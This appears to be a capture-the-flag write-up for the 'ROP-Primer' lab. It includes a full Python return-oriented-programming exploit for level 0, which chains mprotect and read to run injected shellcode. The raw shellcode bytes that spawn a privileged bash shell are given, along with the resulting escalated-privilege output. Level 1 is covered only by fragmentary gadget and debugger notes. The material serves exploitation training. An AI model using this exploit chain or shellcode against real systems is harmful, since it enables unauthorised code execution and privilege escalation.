ROP-Primer
Level 0
#!/usr/bin/python
import struct
def p(x):
return struct.pack('<L',x)
payload=""
payload+="A"*44
payload+=p(0x080523e0) #mprotect@plt
payload+=p(0x08048882) #pppr
payload+=p(0xbfff5000) #addr
payload+=p(0x1000) #page-aligned size
payload+=p(0x7) #PROT_READ|PROT_WRITE|PROT_EXEC
payload+=p(0x80517f0) #read@plt
payload+=p(0x08048882) #pppr
payload+=p(0x0) #fd=SDIN
payload+=p(0xbfff5000) #addr
payload+=p(0x200) #length
payload+=p(0xbfff5000) #address of shellcode
print payloadlevel0@rop:~$ (./gen.py ;python -c 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"'; cat) | ./level0
[+] ROP tutorial level0
[+] What's your name? [+] Bet you can't ROP me, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAĆ ā!
id
uid=1000(level0) gid=1000(level0) euid=1001(level1) groups=1001(level1),1000(level0)
Level 1
Line 71,72 filesize < sizeof (filename)
gdb-peda$ ropgadget ret = 0x804851c popret = 0x8048e93 pop2ret = 0x8048ef7 pop3ret = 0x8048ef6 pop4ret = 0x8048ef5 leaveret = 0x8048610 addesp_44 = 0x8048ef2
0x8049128 “flag”
0xf7f27620
fd[eax]=open(“flag”,?,?) read(fd,buf_addr,size) write(stdout[1], buf_addr, size)
b 0x08048d8c set 0xbffff6c0=0x22ba set follow-fork-mode child b 0x8048a34 (store) b 0x08048c5b (read)